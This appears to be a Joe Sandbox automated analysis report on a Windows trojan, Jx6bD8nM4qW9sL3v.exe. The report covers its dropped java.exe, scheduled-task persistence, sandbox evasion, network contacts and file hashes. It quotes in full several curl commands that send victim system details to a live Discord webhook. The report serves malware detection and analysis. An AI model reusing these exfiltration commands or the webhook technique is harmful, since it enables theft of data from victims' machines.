Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:27.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhm
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:25.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhmJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:27.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhmJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\java.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FCE20C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF670FCE20C
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC7E10 GetUserNameW,GetComputerNameW,GetVolumeInformationW,memset,GetVersionExW,GetModuleHandleW,GetProcAddress,_invalid_parameter_noinfo_noreturn,0_2_00007FF670FC7E10
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC7E10 GetUserNameW,GetComputerNameW,GetVolumeInformationW,memset,GetVersionExW,GetModuleHandleW,GetProcAddress,_invalid_parameter_noinfo_noreturn,0_2_00007FF670FC7E10
Source: Jx6bD8nM4qW9sL3v.exe, java.exeBinary or memory string: ollydbg.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
Scheduled Task/Job		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		1
DLL Side-Loading		1
Scheduled Task/Job		11
Virtualization/Sandbox Evasion		LSASS Memory431
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Exploitation for Client Execution		Login HookLogin Hook1
Indicator Removal		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Account Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
File and Directory Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow13
System Information Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582327 Sample: Jx6bD8nM4qW9sL3v.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 76 38 discord.com 2->38 40 api.ipify.org 2->40 46 Multi AV Scanner detection for submitted file 2->46 48 Sigma detected: Suspicious Processes Spawned by Java.EXE 2->48 50 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->50 8 Jx6bD8nM4qW9sL3v.exe 3 2->8         started        12 java.exe 1 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\java.exe, PE32+ 8->32 dropped 34 C:\Users\user\...\java.exe:Zone.Identifier, ASCII 8->34 dropped 52 Contain functionality to detect virtual machines 8->52 54 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->54 14 cmd.exe 1 8->14         started        16 curl.exe 1 8->16         started        19 conhost.exe 8->19         started        56 Multi AV Scanner detection for dropped file 12->56 58 Exploit detected, runtime environment starts unknown processes 12->58 21 cmd.exe 1 12->21         started        23 curl.exe 1 12->23         started        25 conhost.exe 12->25         started        signatures6 process7 dnsIp8 27 curl.exe 1 14->27         started        36 discord.com 162.159.128.233, 443, 49711, 49717 CLOUDFLARENETUS United States 16->36 30 curl.exe 1 21->30         started        process9 dnsIp10 42 api.ipify.org 104.26.12.205, 443, 49708, 49714 CLOUDFLARENETUS United States 27->42 44 127.0.0.1 unknown unknown 27->44

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Jx6bD8nM4qW9sL3v.exe47%ReversingLabsWin64.Trojan.Generic
Jx6bD8nM4qW9sL3v.exe54%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\java.exe47%ReversingLabsWin64.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://api.ipify.org~0%Avira URL Cloudsafe
https://api.ipify.org20%Avira URL Cloudsafe
http://crl.se10%Avira URL Cloudsafe
https://api.ipify.org90%Avira URL Cloudsafe
https://api.ipify.orgL0%Avira URL Cloudsafe
https://api.ipify.orgWinsta00%Avira URL Cloudsafe
https://api.ipify.orgcurl0%Avira URL Cloudsafe
https://api.ipify.org70%Avira URL Cloudsafe
https://api.ipify.orgvB0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.128.233
truefalse
    		high
    api.ipify.org
    		104.26.12.205
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://api.ipify.org/false
        		high
        https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWUcurl.exe, 0000000A.00000002.2059832303.00000269500E8000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://sectigo.com/CPS0Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
              		high
              http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                		high
                https://api.ipify.orgcurlJx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.sectigo.com0Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                  		high
                  https://api.ipify.org7curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org2java.exe, 00000006.00000002.2060240613.0000022751ECB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org?curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://api.ipify.orgWinsta0curl.exe, 00000003.00000002.2025529355.0000018EE9630000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ipify.org~java.exe, 00000006.00000002.2060240613.0000022751EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ipify.org9Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.se1Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.sectigo.com/SectigoPublicTimeJx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                        		high
                        https://api.ipify.orgcurl.exe, 00000009.00000002.2051339309.000002C6CC54A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                          		high
                          https://api.ipify.orgLcurl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://discord.com/api/webhooKcurl.exe, 00000005.00000002.2033796989.0000015BFD279000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059642518.00000269500F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zJx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                              		high
                              https://api.ipify.org/Itemcurl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.ipify.orgvBcurl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crt.sectigo.com/SectigoPublicTimeStampingRootIJx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Jx6bD8nM4qW9sL3v.exe, java.exe.0.drfalse
                                    		high
                                    https://api.ipify.orgwinsta0curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.12.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      162.159.128.233
                                      		discord.comUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      Private

                                      IP
                                      127.0.0.1

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582327
                                      Start date and time:2024-12-30 11:13:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 54s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Jx6bD8nM4qW9sL3v.exe
                                      Detection:MAL
                                      Classification:mal76.expl.evad.winEXE@16/4@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 68
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      11:13:54Task SchedulerRun new task: JavaUpdater path: C:\Users\user\AppData\Local\java.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/?format=text
                                      xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                      • api.ipify.org/
                                      GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                      • api.ipify.org/
                                      8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                      • api.ipify.org/
                                      Simple2.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                      • api.ipify.org/
                                      Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                      • api.ipify.org/
                                      perfcc.elfGet hashmaliciousXmrigBrowse
                                      • api.ipify.org/
                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                      • api.ipify.org/
                                      162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                      • discord.com/phpMyAdmin/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      api.ipify.orgdsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                      • 104.26.13.205
                                      soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                      • 104.26.13.205
                                      markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 104.26.13.205
                                      utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 172.67.74.152
                                      https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45Get hashmaliciousHTMLPhisherBrowse
                                      • 104.26.12.205
                                      https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.13.205
                                      tg.exeGet hashmaliciousBabadedaBrowse
                                      • 172.67.74.152
                                      tg.exeGet hashmaliciousBabadedaBrowse
                                      • 104.26.12.205
                                      setup.exeGet hashmaliciousBabadedaBrowse
                                      • 104.26.13.205
                                      discord.comdsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                      • 162.159.138.232
                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                      • 162.159.138.232
                                      http://mee6.xyzGet hashmaliciousUnknownBrowse
                                      • 162.159.138.232
                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.136.232
                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.136.232
                                      arm.elfGet hashmaliciousUnknownBrowse
                                      • 162.159.137.232
                                      webhook.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.138.232
                                      zapret.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.136.232
                                      Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                      • 162.159.137.232
                                      chos.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.138.232

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSAirway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                      • 188.114.97.3
                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 188.114.96.3
                                      6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                      • 104.16.79.73
                                      securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                      • 104.18.28.104
                                      lumma.ps1Get hashmaliciousLummaCBrowse
                                      • 104.21.72.190
                                      vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.190.223
                                      sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      CLOUDFLARENETUSAirway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                      • 188.114.97.3
                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 188.114.96.3
                                      6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                      • 104.16.79.73
                                      securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                      • 104.18.28.104
                                      lumma.ps1Get hashmaliciousLummaCBrowse
                                      • 104.21.72.190
                                      vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.190.223
                                      sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      74954a0c86284d0d6e1c4efefe92b521dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233
                                      67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                      • 104.26.12.205
                                      • 162.159.128.233

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\java.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):290944
                                      Entropy (8bit):6.314868285664843
                                      Encrypted:false
                                      SSDEEP:3072:Ls+53MFulvntAJ7G9bYYfXgzaDiAMwys4NFiBCIuvAxs1Iso91l4HFiijaQr1B59:LbntAJ7G9b3IIyJXhEwDFwlKzFs0
                                      MD5:E181EB699888D8BBBE0B89D41DF77678
                                      SHA1:9A500DEADF901DFB3F63DF1AB2CBC679B27FC660
                                      SHA-256:86C52E999CFD2243EA8E81E6FF8B1C6E15EE176807C7911D5A000341200EB757
                                      SHA-512:11E2562B7848F3463B88A741BF5967467B343FA75458FFCD88E230FA6C1D1E1A0329A7C6092848E4C0AB40EC8E770001F94AD92996F691FE27C9D4C51C2FDB9B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@8.P!V.P!V.P!V.YY.^!V.A.U.T!V.A.R.Z!V.A.S.r!V.A.W.V!V..YP.R!V..YW.C!V.P!W..!V.._.T!V....Q!V.P!..Q!V..T.Q!V.RichP!V.................PE..d.....kg.........."....*.....j.................@..........................................`.................................................,M.......................T.......p......P...8...............................@............................................text............................... ..`.rdata...i.......j..................@..@.data........p.......Z..............@....pdata...............d..............@..@.rsrc................r..............@..@.reloc.......p.......R..............@..B........................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\java.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      \Device\ConDrv

                                      Download File
                                      Process:C:\Users\user\AppData\Local\java.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):428
                                      Entropy (8bit):3.2974732613601674
                                      Encrypted:false
                                      SSDEEP:6:LOtEswj2SAykymUef/Ff/8UniehCSgOgcdSgOgcuF/vEVvqF//NNlgOgK6n:LOtEz6ykymUe2bwc9cL9cuNkyN7y9t
                                      MD5:2081808514978CF8CF2DDEE073D5DDBD
                                      SHA1:2A655E0F399EF7838B1395EE92B6CFFE879A9A0E
                                      SHA-256:E8F77474AA788475DB0574EDFCD4F5D63B419D73876E75B0006D3F819D21678A
                                      SHA-512:700EEDD649A8B35BB7FD074F9ABF39629485A76A59BF64BC9E792E0308028067AA08F9C3F693BC77E43EB45F663B367240CBEF72C6613B9B42EDB34E7F99113F
                                      Malicious:false
                                      Preview:Webhook sent. Response: % Total % Received % Xferd Average Speed Time Time Time Current... Dload Upload Total Spent Left Speed.... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 483 0 0 100 483 0 633 --:--:-- --:--:-- --:--:-- 633.....

                                      Static File Info

                                      General

                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                      Entropy (8bit):6.314868285664843
                                      TrID:
                                      • Win64 Executable Console (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Jx6bD8nM4qW9sL3v.exe
                                      File size:290'944 bytes
                                      MD5:e181eb699888d8bbbe0b89d41df77678
                                      SHA1:9a500deadf901dfb3f63df1ab2cbc679b27fc660
                                      SHA256:86c52e999cfd2243ea8e81e6ff8b1c6e15ee176807c7911d5a000341200eb757
                                      SHA512:11e2562b7848f3463b88a741bf5967467b343fa75458ffcd88e230fa6c1d1e1a0329a7c6092848e4c0ab40ec8e770001f94ad92996f691fe27c9d4c51c2fdb9b
                                      SSDEEP:3072:Ls+53MFulvntAJ7G9bYYfXgzaDiAMwys4NFiBCIuvAxs1Iso91l4HFiijaQr1B59:LbntAJ7G9b3IIyJXhEwDFwlKzFs0
                                      TLSH:185443D23051409AE46765F2AE4ECE20619A39DE92B5C74E36D3AB2FCBC33511477B0B
